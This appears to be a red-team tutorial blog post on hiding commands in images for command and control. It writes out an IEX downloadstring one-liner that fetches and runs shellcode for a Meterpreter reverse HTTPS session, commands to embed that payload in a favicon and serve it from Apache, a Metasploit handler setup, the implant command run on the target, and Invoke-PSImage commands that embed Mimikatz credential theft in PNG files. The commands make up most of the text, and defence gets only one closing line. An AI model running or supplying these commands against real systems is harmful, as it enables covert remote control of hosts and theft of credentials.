Penetration Testing Lab

Command and Control – Images


Images traditionally have been used as a method of hiding a message. It is possibly for forensic investigators the oldest trick in the book to search for evidence inside that type of files. However in offensive security and red teaming pictures can hide commands, payloads and scripts.

Michael Scott developed  a python script which can generate an icon image and embed into this image a PowerShell command. The first step is to write the command into a text file.

echo 'IEX((new-object net.webclient).downloadstring(""));Invoke-Shellcode -payload windows/meterpreter/reverse_https -LHOST -LPORT 443 -force' > shellcode.txt

Favicon – Embedded Command

The next step is to create the favicon which will contain the embedded payload, start the apache web server and move the icon to a web server directory.

python shellcode.txt evil.png
service apache2 start
mv evil.png /var/www/favicon.ico

Generation of Favicon

Metasploit module multi/handler can be used to receive the connection once the command is executed on the target host.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443

Metasploit – Multi Handler Module for Favicon

The Get-FaviconText PowerShell script will download the icon into a temporary directory and it will convert the pixels back to characters in order to execute the payload command.

Import-Module .\readFavicon.ps1
Get-FaviconText -URL -WriteTo $env:TEMP

Implant – Favicon Configuration

The Get-FaviconText script is actually the implant which needs to be executed on the target. Even if permissions are not set on the web directory to access this file the payload command inside the icon will still run.

Implant – Favicon

A Meterpreter session will open and the target can be controlled through Metasploit.

Meterpreter via Favicon

However it is also possible to use other types of images such as JPG in order to embed not just commands but full PowerShell scripts in order to perform various other post exploitation activities. Barrett Adams developed a PowerShell module that can use pixels of a PNG file to embed a PowerShell script. This module will also generate an oneliner command for execution:

Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz.png -Web

Embedding Mimikatz in PNG – Web Version

Executing the oneliner will result of running Mimikatz through a PNG file that is stored on a web server.

Mimikatz via PNG over the Web

Alternatively this script can generate an oneliner for an image that is hosted locally.

Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg -Out .\mimikatz2.png

Embedding Mimikatz in PNG – Local Version

Running the command will execute Mimikatz from the PNG file.

Mimikatz via PNG – Local


Images can be used to execute shellcode and scripts and perform other activities. There is a limitation in the number of characters that can be used therefore only images with a lot of pixels can carry a script. It is an interesting method of hiding payloads in plain sight and a type of threat that it could be prevented if PowerShell was disabled across the network.